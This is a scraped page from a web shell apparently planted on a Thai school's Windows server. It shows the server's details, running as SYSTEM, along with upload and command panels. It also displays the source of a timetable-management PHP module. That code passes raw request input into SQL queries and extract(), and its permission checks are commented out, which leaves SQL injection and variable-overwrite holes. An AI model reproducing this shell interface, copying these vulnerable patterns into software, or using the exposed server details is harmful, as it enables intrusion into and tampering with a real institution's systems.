403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/benjama/modules/w21/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/benjama/modules/w21/addteachtable.php
<?
print_r($_REQUEST);

extract($_REQUEST, EXTR_OVERWRITE);
require_once(__DIR__ . "/const.php");
require_once(__DIR__ . "/lib.php");
//$uid = CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);

?>
<link href="css/template_css.css" rel="stylesheet" type="text/css" />


	<TABLE cellSpacing=0 cellPadding=0 width=100% border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>
		  <!-- user -->
				<TABLE width="900" align=center cellSpacing=0 cellPadding=0 border=0>
				<TR>
					<TD>
					<BR>
<?

if(! isset($_GET['op'])) $_GET['op'] = "subject_add";

 if(($_GET['op'] == "subject_add" || $_GET['op'] == "subject_edit") AND $_GET['action'] == "add"){
    //////////////////////////////////////////// กรณีเพิ่ม Database
    
	if(CheckLevelUser($_SESSION['user_user'],'course_add')){
//	CheckUser($_SESSION['user_user']);
echo "aaaaa";
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='$uid' ");
		$arr[user] = $db->fetch($res[user]);
		
 		$FILE = $_FILES['files1'];
		if (!$_POST[subject] ){
			echo "<script language='javascript'>" ;
		//	echo "alert('กรุณากรอกข้อมูลต่างๆให้ครบถ้วน')" ;
			echo "</script>" ;
		//	echo "<script language='javascript'>javascript:history.back()</script>";
		//	exit();
        } 


		if($_GET[op] == "subject_add"){
            //ทำการเพิ่มข้อมูลลงดาต้าเบส
       
                    $db->add_db(TB_teach_table	,array(
                        "year"=>"$_POST[YEAR]",
                        "term"=>"$_POST[TERM]",
                        "code"=>"$_POST[CODE]",
                        "teacher"=>"$_POST[TEACHER]",
                        "class"=>"$_POST[CLASS]",
                        "room"=>"$_POST[ROOM]",
                        "classroom"=>"$_POST[CLASSROOM]",
                        "day"=>"$_POST[DAY]",
                        "period"=>"$_POST[PERIOD]",
                        "numperiod"=>"$_POST[NUMPERIOD]"
                    ));
                    
                } 
                else {
                        //ทำการแก้ไขข้อมูลลงดาต้าเบส
              
                    $data = array(
                        "year"=>"$_POST[YEAR]",
                        "term"=>"$_POST[TERM]",
                        "code"=>"$_POST[CODE]",
                        "teacher"=>"$_POST[TEACHER]",
                        "class"=>"$_POST[CLASS]",
                        "room"=>"$_POST[ROOM]",
                        "classroom"=>"$_POST[CLASSROOM]",
                        "day"=>"$_POST[DAY]",
                        "period"=>"$_POST[PERIOD]",
                        "numperiod"=>"$_POST[NUMPERIOD]"
                    );
                    
                    $db->update_db(TB_teach_table , $data," id=$_GET[id] ");
                        
                }
        
                if($debug) print_r($db->error);
                $year=$_POST[YEAR];
                $term=$_POST[TERM];
                $ProcessOutput .= "<BR><BR>";
                $ProcessOutput .= "<CENTER><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
                $ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการเพิ่ม  เข้าสู่ระบบเรียบร้อยแล้ว</B></FONT><BR><BR>";
                $ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=w21&file=addteachtable&op=subject_add&year=$year&term=$term&code=$_POST[CODE]&classroom=$_POST[CLASSROOM]\">";
                $ProcessOutput .= "</CENTER>";
                $ProcessOutput .= "<BR><BR>";
                
            }else{
                //กรณีไม่ผ่าน
                $ProcessOutput = $PermissionFalse ;
            }
            echo $ProcessOutput ;
        }
        else if($_GET['op'] == "subject_add" || $_GET['op'] == "subject_edit" ){
            //////////////////////////////////////////// กรณีเพิ่ม Form
        //	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
        //	CheckUser($_SESSION['user_user']);
            
                $res['user'] = $db->select_query("SELECT * FROM ".TB_user." WHERE id='$uid' ");
                $arr['user'] = $db->fetch($res['user']);
        
                if($_GET['op'] == "subject_edit"){
                    $res['teach_table'] = $db->select_query("SELECT * FROM ".TB_teach_table." WHERE  id='".$_GET['id']."' ");
                    $arr['teach_table'] = $db->fetch($res['teach_table'	]);
                    $year = $arr['teach_table']['year'] ;
                    $term = $arr['teach_table']['term'] ;
                }
                if( isset($_REQUEST["YEAR"]) ) $year = $_REQUEST["YEAR"] ;
                if( isset($_REQUEST["TERM"]) ) $term = $_REQUEST["TERM"] ;   
                if($year==0) $year=get_cur_year_ed();
                if($term==0) $term=get_cur_term();       
                $froom = ( isset($_GET["room"]) ) ? $_GET["room"] : "" ;        
                $fcode = ($_GET['code']) ? $_GET['code'] :  $arr['teach_table']['code']  ;
                $fclassroomroom = ( isset($_GET["classroom"]) ) ? $_GET["classroom"] : $arr['teach_table']['classroom'] ;   
                $fnumpereiod = ( isset($_REQUEST["NUMPERIOD"]) ) ? $_REQUEST["NUMPERIOD"] : $arr['teach_table']['numpereiod'] ;                   
                ?>

        <table width="100%"align="center"border="0" cellspacing="0" cellpadding="0" bgcolor="#99CCC5">
        <TR>
        <TD width="30%" align=left>
        <a href='?name=w21'>
        <img src="images/admin/exit.gif" width="20" height="20"align="middle" border="0"alt="ออกจากหน้านี้" />
         <font color=red><B>ออกจากหน้านี้</B></font></a>
        </TD>
        <TD width="70%" >
        <B>แบบบันทึกตารางสอน</B>
        </TD>
        </TR>
        <tr height=8><td>  </td></tr>
        <TR><TD width="30%" align=right><b>ปีการศึกษา</b> &nbsp;&nbsp;&nbsp;&nbsp;</TD>
            <TD>
            <FORM METHOD=POST ACTION="" name=mFrm  onchange="javascript:this.submit();">
            </b> <? echo prn_year($year); ?>
                    <b><? echo hspace(5);?> ภาคเรียนที่ </b> <? echo prn_term($term); ?>
            </FORM>
            </TD></TR>

        <tr height=8><td>  </td></tr>

        <FORM NAME="myform" METHOD=POST ACTION="?name=w21&file=addteachtable&op=<? echo $_GET[op] ;?>&action=add&&id=<? echo $_GET[id];?>"  
            enctype="multipart/form-data" id="myform" onSubmit="return checkregis()">
            <INPUT TYPE="hidden" NAME="USER_ID" size="5" value="<?=$arr[user][id];?>">
            <INPUT TYPE="hidden" NAME="USER_NAME" size="5" value="<?=$arr[user][username];?>">
            <INPUT TYPE="hidden" NAME="NAME" size="5" value="<?=$arr[user][category_name];?>">
            <INPUT TYPE="hidden" NAME="YEAR" value="<?=$year;?>">
            <INPUT TYPE="hidden" NAME="TERM" value="<?=$term;?>">

        <TR>
        <TD width="30%" align=right>
        <b>รหัสวิชา</b> &nbsp;&nbsp;&nbsp;&nbsp; 
         </TD>
        <TD><? echo prn_subject_list($fcode); ?>
        <a href="javascript:NewWindow('popup2.php?name=w21&file=addsubject','acepopup','824','720','center','front');" >เพิ่มรายวิชา</a>

        </TD>
        
        </TR>
        
        <tr height=8><td>  </td></tr>

        <TR>
        <TD width="30%" align=right>
        <b>ผู้สอน</b> &nbsp;&nbsp;&nbsp;&nbsp;
        </TD>
        <TD><? echo prn_teacher_list($arr['teach_table']['teacher']); ?></TD></TR>
        </TR>
        <tr height=8><td>  </td></tr>

        <tr height=8><td>  </td></tr>
        <TR>
        <TD width="30%" align=right>
        <b>ระดับชั้น</b> &nbsp;&nbsp;&nbsp;&nbsp;
        </TD>
        <TD><? echo prn_class($arr['teach_table']['class']); ?> &nbsp;&nbsp;
        ห้อง <? echo prn_room($arr['teach_table']['room']); ?> 
        </TD></TR>
        <tr height=8><td>  </td></tr>

        <TR>
        <TD width="30%" align=right><b>ห้องเรียน</b> &nbsp;&nbsp;&nbsp;&nbsp; </TD>    
        <TD><? echo prn_class_list($fclassroom); ?>
        </TD></TR>
        <tr height=8><td>  </td></tr>    

        <TR>
        <TD width="30%" align=right>
        <b>วัน</b> &nbsp;&nbsp;&nbsp;&nbsp;
        </TD>
        <TD><? echo prn_days($arr['teach_table']['day']);?></TD>
        </TR>
        <tr height=8><td>  </td></tr>

        <TR>
        <TD width="30%" align=right>
        <b>คาบเรียนที่</b> &nbsp;&nbsp;&nbsp;&nbsp;
        </TD>
        <TD><? echo prn_period($arr['teach_table']['period']);?></TD>
        </TR>
        <tr height=8><td>  </td></tr>
        <TR>
        <TD width="30%" align=right>
        <b>จำนวนคาบเรียน</b> &nbsp;&nbsp;&nbsp;&nbsp;
        </TD>
        <TD><? echo prn_numperiod($arr['teach_table']['numperiod']);?></TD>
        </TR>
        <tr height=8><td>  </td></tr>


        <TR>
        <TD width="30%" align=right>
        </TD>
        <TD>
        <BR>
            <INPUT TYPE="submit" value=" บันทึกข้อมูล" name="submit">
            </div>
            </td>
            </tr>
          </table>
        </FORM>
        <BR>
        <table width="100%" cellspacing="2" cellpadding="1" >
        <tr bgcolor="#3399cc" height=25>
           <td  align=center width="3%"><font color="#FFFFFF"><B>ลบ</B></font></td>
           <td width="10%"  align=center ><font color="#FFFFFF"><B>รหัสวิชา</B></font></td>
           <td width="35%"  align=center ><font color="#FFFFFF"><B>ชื่อวิชา</B></font></td>
           <td width="10%" align=center ><font color="#FFFFFF"><B>วัน</B></font></td>           
           <td width="15%"  align=center ><font color="#FFFFFF"><B>ชั้น</B></font></td>
           <td  width="5%" align=center><font color="#FFFFFF"><B>ห้อง</B></font></td>
            <td width="5%" align=center ><font color="#FFFFFF"><B>คาบที่</B></font></td>
            <td width="5%" align=center ><font color="#FFFFFF"><B>จำนวนคาบ</B></font></td>
            <td width="5%" align=center ><font color="#FFFFFF"><B>ชั่วโมง</B></font></td>
          </tr>  
        <?

            $sql = "SELECT * FROM ".TB_teach_table." WHERE year=$year AND term=$term  ORDER BY day,period" ;
    
            $res['subject'] = $db->select_query($sql);
            $count=0;
            while($arr['subject'] = $db->fetch($res['subject']))
            {
                $res['sara'] = $db->select_query("SELECT * FROM ".TB_subject." WHERE code='".$arr['subject']['code']."' "); 
                $arr['sara'] = $db->fetch($res['sara']);

         ?>
            <tr bgcolor="#FFFFDF"height=20>
                <td align="center">	  <a href="javascript:Confirm('?name=w21&file=addteachtable&op=subject_del&id=<?=$arr[subject][id];?>','คุณมั่นใจในการลบ เรื่องนี้ของ: <?echo $arr[subject][code];?>');"><img src="images/publish_x.png"  border="0" alt="ลบ" ></a></td>

                <td>
                    <a href='?name=w21&file=addteachtable&op=subject_edit&id=<?=$arr['subject']['id'];?>' >
                        <?=$arr['subject']['code'];?>
                    </a>
                </td>
                <td><?=$arr['sara']['name'];?></td>

                <td ><?= $days[$arr['subject']["day"] ];?></td>
                 <td ><?=$arr['subject']["class"]. "/" .$arr['subject']["room"];?></td>
                 <td ><?=$arr['subject']["classroom"];?></td>
                <td align="center"><?=$arr['subject']['period'];?></td>
                <td align="center"><?=$arr['subject']['numperiod'];?></td>
                <td align="center"><?=floor(($arr['subject']['numperiod']*55)/60) .":". (($arr['subject']['numperiod']*55)%60);?></td>

            </tr>
        
        </td>
          </tr>
        <? 
            $sum_period += $arr['subject']['numperiod'] ;
        }
        echo "<tr><td colspan=7 align=center>รวม</td><td align=center>" .$sum_period ."</td>";
        echo "<td align=center>" . floor(($sum_period*55)/60) .":". (($sum_period*55)%60)."</td></tr>";
        
         ?>
            </TABLE>
        <?
        //	}else{
        //		//กรณีไม่ผ่าน
        //		echo  $PermissionFalse ;
        //	}
        }
        else if($_GET['op'] == "subject_del" AND $_GET['action'] == "multidel"){
            //////////////////////////////////////////// กรณีลบ Multi
        
                $res['user'] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
                $arr['user'] = $db->fetch($res['user']);

        $res['subjec'] = $db->select_query("SELECT * FROM ".TB_subjec." WHERE id='$uid' ");
        $arr['subjec'] = $db->fetch($res['subjec']);
        
            if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
                while(list($key, $value) = each ($_POST['list'])){

                    $res['subject'] = $db->select_query("SELECT * FROM ".TB_teach_table ." WHERE id='".$value."' ");
                    $arr['subject'] = $db->fetch($res['subject']);
                    $db->del(TB_teach_table	," id='".$value."' "); 
        
                }
                $ProcessOutput .= "<BR><BR>";
                $ProcessOutput .= "<CENTER><A HREF=\"?name=user&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
                $ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
                $ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=personal&file=addsubject
        &op=subject
        _add&id=".$arr[user][id]."\">";
                $ProcessOutput .= "</CENTER>";
                $ProcessOutput .= "<BR><BR>";
            }else{
                //กรณีไม่ผ่าน
                $ProcessOutput = $PermissionFalse ;
            }
            echo $ProcessOutput ;
        }
        else if($_GET[op] == "subject_del"){
            //////////////////////////////////////////// กรณีลบ Form
            if(CheckLevelUser($_SESSION['user_user'],"course_add")){

                $res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
                $arr[user] = $db->fetch($res[user]);
        
                    $res[subject] = $db->select_query("SELECT * FROM ".TB_teach_table ." WHERE id='".$uid."' ");
                    $arr[subject] = $db->fetch($res[subject]);
                    $db->del(TB_teach_table	," id='".$_GET[id]."' "); 
        
                $ProcessOutput .= "<BR><BR>";
                $ProcessOutput .= "<CENTER><A HREF=\"?name=user&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
                $ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
                $ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=w21&file=addsubject&op=subject_add&id=".$arr[user][id]."\">";
                $ProcessOutput .= "</CENTER>";
                $ProcessOutput .= "<BR><BR>";
            }else{
                //กรณีไม่ผ่าน
                $ProcessOutput = $PermissionFalse ;
            }
            echo $ProcessOutput ;
        }
        

        
        ?>
                            </TD>
                        </TR>
                    </TABLE>
                    <BR><BR>
                    <!-- user -->
                  </TD>
                </TR>
              </TBODY>
            </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit